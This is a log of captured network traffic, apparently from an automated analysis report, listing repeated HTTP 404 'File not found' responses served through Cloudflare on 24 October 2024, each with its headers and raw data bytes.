Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YJOB3EqGfH%2Ferx6aJhQ6IR7IIiIetPbHGnxenIGVgYHUVNnD%2BbGvys3z%2BbYvnFzwokqpMKMEIUfdX92Ff9m4W2hlYnQZQ8P3ifyI4froXDHsRnpVr%2BWEGnJySGp7cw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8d82d666b27-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2279&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ecqebKWXcrDHQbdTvxQvwg0fTJ%2Fp1F9iS96GakokyRmu%2Fkux%2Bjx6xK6DmtAvHcSYlB5HnuHbwh5kZXdQ3lupVJUVC7SFDY9lpzBC7hAZmP0OHyAwKTCfgGbnp2CSjQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8ee6a696c39-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1173&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eLe32ZI%2FG%2BuYU3ABNJRRuZeHkyNL00TkKjEOJCmQZPeVfr3a0hu6P3VKaIf%2BTosLtMLeOOtUS2YnzCnDiq3Vt4z3XMKOnN5JgCX6bvQjhEiZSLYP5MMh866Vqg0QhQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8f4ea04e972-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2639&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ciScChgOKV53j9TS3Z3ZHBFJdj1KdJt5nFbAlbeocgkV5PqB9RC%2BVHXaqmdoxIfxQ2eZwd25%2F1YNoiZzbZrq0wO1T9IhXyk2UVb1G%2Bi5SdIPvaYq4p7q8EjDBio6ow%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8fe6fc23177-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1384&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=25RhSey%2FcM%2BswRdxG1LMHPNnjkRvLpDD5pIkJy1uHxYZwdLngLIuKBn6ZqOb9uW69EUGrO%2FtNqkVL9uzJlCvKrWr19pfk2EZOlVRRJ13VeaN3Xf4V9SWDWbbnb2ppw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad906ddf33587-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1027&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=za4JpOlF%2BOgek7zH6Hn0LC5oUB3J%2FP7D27N4YmPUBUaMmWtaDYJcE3yngqA3ZwkiGepz%2FGHtMnz9cjJmuUP3yNi%2Fcmp9DjGPmmADDkwdUrTQOf1wKeLCedVdbVEC1A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad90e4a42eb16-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1342&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5K7iotL3nAhCSPYeShaXClHk1grtDcAKT0KQvzyS19YO3ayDZ04vy0aT1%2FOrjxGa4u5hhBh2jrsiScbn5D%2FY0CMpJHbPF1HxsgP3Oojd54zA9%2F5MHLSdjcOPU9wTng%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad914dcb44686-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e2M2Qre%2B6VFO1EHq7YppP8IiDqk862QfLwmiSfExtL0%2BArSrm3a00JPHe6jtDyrYl8%2FDcXU9BC8x0vTkEPGP4hEgqL8etDNeX14uLFcxTTeUJvyg6vCqgBfDEtS9Ug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad91b3a426c4f-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1960&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eu308C6Ct2CohWKQtNacv2V7v4cXH4kloVKKMFPmpdHE1GsJlXiHSmjNZlMZ%2BkJdKPvC3SeyryLD4ubhiX0uN0XLaua9EzLpvxhATYhI0%2FGy2aRjlCoeKFlh%2FbMnWw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad921eb92e836-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2232&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Os%2B5AK2Olpaw6rtRTHBzN5kgkEFg%2BLu7s2gKfOY6HJKS9C0iulTwmZnCPX4hTssvbiJLTtsNOMaHsPZnpG%2BeE8fxOMZKOMkNyWS1O2jol9lvhQw3bfx8MQLuqXYXCQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9286fe54785-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1237&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=50QhMYSqwXKbd4dAt2So0M3A8SNMYi92MLmJgic%2FSypVUrpSlvIXI2bvVXuV4mIxVpEJBj1%2FnZLAKjVwk%2BppjQ8Ccb1xaLilHo79niPKnuvRwyJYhZ1Aix68fHnjqg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad92f2f5f8d2c-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1644&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=81&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4pLn2gnsA6xxnF7szO%2BWWnraqx%2FYya5W3HTHBbRo0np%2FS55TYuV5o3fEg%2Bg58N3RUxpzZs1aErMpK4CZa52IP8HuPVdXlQ9GUYlEl3rngImI4rwhl%2BTMHF0VKhDKfg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad93d7a7b6b3c-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1938&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xZHLcL%2BmGZTykGDUb7wogaVViCdsHa3QnMB46GUt9xRjhaa0Z6sQe4GYLpeXxJVqgTt9yaHy1iN4hQAGHxJI%2F17AfbOjC9mS7M3GHwNwI3psoi3mrngZ06%2BsAYGqJQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9442cf33474-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pYfuQWh1ubE6HwrD2PVFy8pPLBrP7fVwJMfundcELeNFsjHovegYWfIoCKNFtIF4ryZGybLO5WeZSF5rQRWVsBmrCctHk0UfobPkzlLNVBEOxRMebi2g86kOzRudug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad94afa724605-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1142&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tLQk0UjL3x%2BLzVyi4coA%2FhX83SNnECLY0k09LvGrIcXxb2cwJIO5DWHA2MLtxu3DKYjSEUWyIz8YRcgfg6qLVpG6cmkwhVZREISEaw7LeXWhYLoGU9YtzHKSt9abOQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9582e8145f9-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsV8TR%2BGBQet%2F1qH20FzvWqGxR8lKwDM9sq1v3PhCQFYDeaIRhOGE990FTP2VyPBsbWFdZ28zWushaUPQKNtsN0fvg%2FEGlzWWl1qIUKteRsf8uW1V0%2FHsm9HEi0vmQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad95ecc776c64-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1880&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FtJivfOaxenTKizqzCB1r%2Bv4aaHT8%2B1meOxAHDGbtP0oWaaVTtfRuxUpiYogrNlqzh56%2BmAuSn8vmu9FsfgpvkHqgkYhY0MQEx1qMYTflqHnTehjoknPokWL7lpaOw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9653d082e25-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1025&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=64Gd7D9cNAC%2BWeQi18d97O%2BFHM2cC%2FGha2Okf%2Brvc8eUFr6hqhjQPUVeiElayVGGqcziWeg%2Bi3i8867%2FUsbViiFgv1uawU7xLZdhXJ8XMwfLRL8sQOHdhZZcbqblUA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad96d9f5ce534-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1343&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1dYyk%2B1aHI9sNDhPQyR3EGfuYlNJfwCjXRNV696tm84LtYrZIZKRiIExRpL1gWYXeeiPVyhxRuWQeJ76wSyNPKQDUV%2BatY%2B2GCEe6FFOY767DdHpSeeHZ9vSpvRDJA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9753bf02cce-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1524&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ghrbr8HWaKyEIcbXbZ0uuqzCCBoVaPglJKiA339dHduFOIL1TwMzH9uHLEhdtv8%2BAJFKQF%2FhGXorIJyWH7T3YRHqZRb2ZiUn15AVXpflCNZyC8M0zoyuC9obZXehQQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad97c2e8e4763-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1786&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=62HvQa5B1PVtYXp7fNbHdRfunOPboMmWhs%2Bo8HJKl4qKlx5vp6E5gnBlKERZ7hU%2BNUm4YLqaC2YabOPWWZLNGGRN9JUBmqaTRUXE2sB8Bnv7s9SFIzwyC7kuPzILag%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad98a09c7461e-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1145&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tCtyULF3a9teyp%2FLzBS1NMYgl4ta5cmf14y7Dk989Y7UaACxYkUxtujmgeJVNyckk25svdwRLRtUBXMI%2B3iNGA7GxHcR0ky9ci5KmQcYX1oqL8kw%2F31l4xs0Dk6MWg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9906b014870-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1168&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wrmhXT%2FQhM99QDk7xPAxCe6xCbPwLs2OpBShj7lWk5VqdF3z4ZxqzK%2FawZtf1fg4UVkiCm6flA8%2B2hM3WJZ%2FymEZxV2TfZiol4jZzrf4AWFYwBaz51MNRjp7c44gA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad997fcc0e76e-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1105&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UHUBncF3y283oCNqH1YGxN8eesV3mfiV2vyWI%2BgMmbFT0KJD%2FzZ08L3lMI1YIPKFfkCXo52fb96htnCG8KG1z3vTNO9PZWwT0bb4jjf58%2BvurtiTzrWYOn6dEz2JNw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9ac6f836c19-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1117&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UrcHAnxqQ5NLlGG7dBsoh3LtMe3srdBvsIEoWOawnJKWTzeTz%2Fj%2Fdr6Ykr%2Fc46CKbZPtJXY1zCjroZ01XBN27t7j%2FuiH%2FRhYNaJAmLBSycM5SnjgV2lYjhfSqh9Cbg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9bca9f82cd5-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2269&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VsCeeoYNBLF9gQhR1iawkzcwxvxkKE07wgJiABNyzWBopfub38hYcQS%2Bm%2BmVRyYF4skuIH1U84tJ7vFEpeporZjtwmiOzgyJ7CupqV7aEu8Y%2FL5rdtD8T9i603uJxw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9d96ba74672-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1147&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
